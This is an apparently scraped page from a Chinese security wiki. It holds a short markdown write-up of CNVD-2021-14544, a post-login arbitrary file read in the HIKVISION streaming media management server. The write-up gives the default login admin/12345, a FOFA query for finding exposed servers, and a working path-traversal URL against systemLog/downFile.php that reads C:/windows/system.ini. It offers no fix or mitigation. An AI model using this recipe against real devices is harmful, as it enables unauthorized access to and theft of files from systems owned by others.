menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right HIKVISION chevron_right HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544.md
    775 B / 2021-04-15 12:15:19
        # HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544
    
    ## 漏洞描述
    
    杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞,攻击者可利用该漏洞登录后台通过文件遍历漏洞获取敏感信息
    
    ## 漏洞影响
    
    > [!NOTE]
    >
    > HIKVISION 流媒体管理服务器
    
    ## FOFA
    
    > [!NOTE]
    >
    > title="流媒体管理服务器"
    
    ## 漏洞复现
    
    登录页面如下, 默认账号密码为 **admin/12345**
    
    ![](image/hiv-5.png)
    
    POC如下,访问如下Url下载 system.ini文件
    
    ```
    http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini
    ```
    
    ![](image/hiv-6.png)
    
    成功读取 **C:/windows/system.ini**
    
    
    
    links
    file_download